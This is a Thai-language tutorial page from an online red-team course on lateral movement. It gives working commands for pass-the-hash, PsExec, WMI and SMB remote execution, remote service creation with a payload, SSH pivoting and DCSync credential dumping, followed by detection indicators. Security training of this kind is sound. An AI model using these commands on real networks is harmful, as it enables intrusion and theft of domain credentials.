เทคนิคการเคลื่อนที่ภายในเครือข่าย
เคลื่อนที่ผ่านเครือข่ายโดยใช้ WMI, PsExec, WinRM และการแชร์ SMB โดยไม่ก่อให้เกิดการแจ้งเตือน
เทคนิคการเคลื่อนที่ภายในเครือข่าย เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
การเคลื่อนที่ด้านข้างคืออะไร
การเคลื่อนที่ด้านข้าง คือชุดเทคนิคที่ผู้โจมตีใช้เคลื่อนผ่านเครือข่ายอย่างต่อเนื่องหลังจากบุกรุกครั้งแรก — เคลื่อนจากจุดยึดเริ่มต้นไปยังเป้าหมายที่มีมูลค่าสูงกว่า เช่น ตัวควบคุมโดเมน ฐานข้อมูล และระบบสำรองข้อมูล
การส่งต่อแฮช (PtH)
การยืนยันตัวตนของ Windows ด้วย NTLM อนุญาตให้ใช้แฮชของรหัสผ่านโดยตรงแทนรหัสผ่านแบบข้อความธรรมดา ผู้โจมตีที่ดึงแฮช NTLM ออกมาได้สามารถยืนยันตัวตนกับระบบอื่นโดยไม่ต้องถอดรหัสแฮช
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHการส่งต่อตั๋ว (PtT)
ตั๋ว Kerberos (TGT หรือ TGS) สามารถดึงออกจากหน่วยความจำและนำเข้าเพื่อยืนยันตัวตนในฐานะผู้ถือครองตั๋วได้ การโจมตีด้วยตั๋วทองคำปลอมแปลง TGT โดยใช้แฮช KRBTGT ทำให้เข้าถึง Kerberos ในโดเมนได้อย่างไม่จำกัด
การเรียกใช้โค้ดจากระยะไกล: PSExec
psexec (Sysinternals และ Impacket) เรียกใช้คำสั่งบนโฮสต์ Windows ระยะไกลผ่าน SMB หรือการแชร์สำหรับผู้ดูแลระบบ ต้องใช้ข้อมูลประจำตัวของผู้ดูแลระบบ และสร้างไบนารีบริการบนเป้าหมาย
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecการเคลื่อนที่ด้านข้างผ่าน WMI
Windows Management Instrumentation ช่วยให้เรียกใช้โค้ดจากระยะไกลได้โดยไม่ต้องสร้างไฟล์ที่เครื่องมือจำนวนมากสามารถตรวจจับได้:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB และการแชร์สำหรับผู้ดูแลระบบ
การแชร์สำหรับผู้ดูแลระบบของ Windows (C$, ADMIN$, IPC$) ช่วยให้เคลื่อนที่ด้านข้างได้ด้วยข้อมูลประจำตัวของผู้ดูแลระบบ:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5บริการระยะไกล: sc และ at
สร้างบริการหรืองานตามกำหนดเวลาบนระบบระยะไกล:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP และเซสชันแบบโต้ตอบ
RDP (โพรโทคอลเดสก์ท็อประยะไกล พอร์ต 3389) ให้การเข้าถึงแบบโต้ตอบได้อย่างเต็มรูปแบบ ผู้โจมตีใช้ RDP ด้วยข้อมูลประจำตัวที่ขโมยมา การป้องกัน: จำกัด RDP ให้ใช้ได้เฉพาะผ่านเซิร์ฟเวอร์ทางผ่าน กำหนดให้ใช้ NLA และบันทึกทุกเซสชัน
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH ในการเคลื่อนที่ด้านข้าง
ในสภาพแวดล้อมลินุกซ์ ผู้โจมตีใช้ SSH พร้อมคีย์หรือข้อมูลประจำตัวที่ขโมยมาเพื่อเคลื่อนที่ด้านข้าง การใช้การส่งต่อตัวแทนในทางที่ผิดช่วยให้เปลี่ยนเส้นทางผ่านโฮสต์ที่ถูกบุกรุก อุโมงค์ SSH ใช้ส่งต่อพอร์ตเพื่อเข้าถึงระบบที่โดยปกติไม่สามารถเข้าถึงได้
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostการจำลองแบบ Active Directory (DCSync)
DCSync ใช้ประโยชน์จากการจำลองแบบของ AD เพื่อดึงแฮชรหัสผ่านโดยตรงจาก DC โดยไม่ต้องเรียกใช้โค้ดบน DC — ต้องมีสิทธิ์ DS-Replication-Get-Changes-All:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtการตรวจจับการเคลื่อนที่ด้านข้าง
ตัวบ่งชี้สำหรับการตรวจจับ:
- เหตุการณ์ 4624 (การเข้าสู่ระบบ) ที่มีการเข้าสู่ระบบประเภท 3 (เครือข่าย) ซึ่งผิดปกติ
- การสร้างบริการบนโฮสต์ระยะไกล (เหตุการณ์ 7045)
- การเชื่อมต่อ SMB ระหว่างเวิร์กสเตชัน
- การสร้างกระบวนการ WMI บนโฮสต์ระยะไกล
- พฤติกรรมบัญชีที่ผิดปกติ (ผู้ใช้เข้าสู่ระบบจากหลายเครื่อง)
ตรวจสอบอย่างรวดเร็ว: การเคลื่อนที่ด้านข้าง
เทคนิคใดที่ช่วยให้ผู้โจมตียืนยันตัวตนกับระบบ Windows โดยใช้แฮช NTLM ที่ดักจับมาโดยไม่ต้องถอดรหัส
สรุปบทเรียน
การเคลื่อนที่ด้านข้างใช้ข้อมูลประจำตัวและโพรโทคอลที่ถูกบุกรุกเพื่อแพร่ผ่านเครือข่าย เทคนิคสำคัญ ได้แก่ การส่งต่อแฮช (นำแฮช NTLM กลับมาใช้) การส่งต่อตั๋ว (Kerberos) การใช้ PSExec, WMI และ SMB เพื่อเรียกใช้โค้ดจากระยะไกล และ DCSync เพื่อเก็บเกี่ยวข้อมูลประจำตัวของโดเมน การตรวจจับ: การเข้าสู่ระบบเครือข่ายที่ผิดปกติ (เหตุการณ์ 4624) การสร้างบริการระยะไกล (เหตุการณ์ 7045) และการรับส่งข้อมูล SMB ระหว่างเวิร์กสเตชัน
คำถามที่พบบ่อย
บทเรียน “เทคนิคการเคลื่อนที่ภายในเครือข่าย” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “เทคนิคการเคลื่อนที่ภายในเครือข่าย” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “เทคนิคการเคลื่อนที่ภายในเครือข่าย”
เคลื่อนที่ผ่านเครือข่ายโดยใช้ WMI, PsExec, WinRM และการแชร์ SMB โดยไม่ก่อให้เกิดการแจ้งเตือน คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน
บทเรียน “เทคนิคการเคลื่อนที่ภายในเครือข่าย” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม
ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- เฟรมเวิร์ก C2: Cobalt Strike และ Sliver
- ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)
- เทคนิคการเคลื่อนที่ภายในเครือข่าย
- การเขียนรายงานเรดทีม